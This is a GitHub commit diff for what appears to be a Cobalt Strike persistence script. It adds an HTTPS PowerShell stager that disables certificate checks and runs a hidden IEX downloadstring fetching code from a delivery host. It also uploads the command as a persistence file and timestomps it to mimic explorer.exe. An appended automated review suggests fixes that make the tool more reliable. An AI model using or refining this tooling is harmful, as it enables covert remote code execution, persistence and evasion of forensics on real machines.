updated to reflect "Scripted Web Delivery".

Thanks @andrewchiles
ZonkSec 2016-09-30 08:07:38 -05:00 committed by GitHub
parent bc44ca53b2
commit 677cdc9060
1 changed files with 20 additions and 6 deletions


@ -94,17 +94,31 @@ alias persistence {
########### Subroutines ############# ########### Subroutines #############
sub checkPSpayload{ sub checkPSpayload{
foreach $site (sites()) { foreach $site (sites()) {
if ($site['Description'] eq "PowerShell Web Delivery"){ # Site description was updated in CS 3.X from "PowerShell Web Delivery" to "Scripted Web Delivery (powershell)"
if ($site['Description'] eq "Scripted Web Delivery (powershell)"){
return true; return true;
} }
} }
} }
sub uploadPSpayload { sub uploadPSpayload {
foreach $site (sites()) { foreach $site (sites()) {
if ($site['Description'] eq "PowerShell Web Delivery"){ if ($site['Description'] eq "Scripted Web Delivery (powershell)"){
$downloadstring = "http://" . $site['Host'] . ":" . $site['Port'] . $site['URI']; if ($site['Port'] eq '443' ){
$data = "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring(\'" . $downloadstring . "\'))\""; binput($1, "[*] Using HTTPS Powershell Stager");
bupload_raw($1, $payloadPath, $data); # Modified to allow staging over HTTPs if a self-signed cert is used
# Add HTTPS over HTTP
$downloadstring = "https://" . $site['Host'] . ":" . $site['Port'] . $site['URI'];
# Disable certficate validation checking
$data = 'powershell.exe -nop -w hidden -c "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};';
$data = $data . "IEX ((new-object net.webclient).downloadstring(\'" . $downloadstring . "\'))\"";
}
else {
$downloadstring = "http://" . $site['Host'] . ":" . $site['Port'] . $site['URI'];
$data = "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring(\'" . $downloadstring . "\'))\"";
}
binput($1, "[*] Attempting to upload persistence file: $2");
bupload_raw($1, $2, $data);
btimestomp($1,$2,'C:\Windows\explorer.exe')
} }
} }
} }
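Review bot: The new branch at `if ($site['Port'] eq '443' ){` in uploadPSpayload infers the scheme from the port number alone, so a site served over HTTPS on any other port, or over plain HTTP on 443, gets a download string with the wrong scheme and the upload proceeds with a stager that cannot fetch anything; if the record returned by sites() exposes the protocol, that field is the reliable signal, otherwise the assumption should at least be stated with `# Port 443 is the only HTTPS indicator used here; HTTPS sites on other ports fall into the HTTP branch`. In checkPSpayload the loop simply falls off the end when no site matches, so the sub returns nothing rather than an explicit false value; adding `return $null;` after the foreach makes the contract clear to callers. The final statement `btimestomp($1,$2,'C:\Windows\explorer.exe')` lacks a terminating semicolon, which the Sleep parser may tolerate as the last statement of a block but is inconsistent with the surrounding lines. The comment `# Disable certficate validation checking` misspells "certificate".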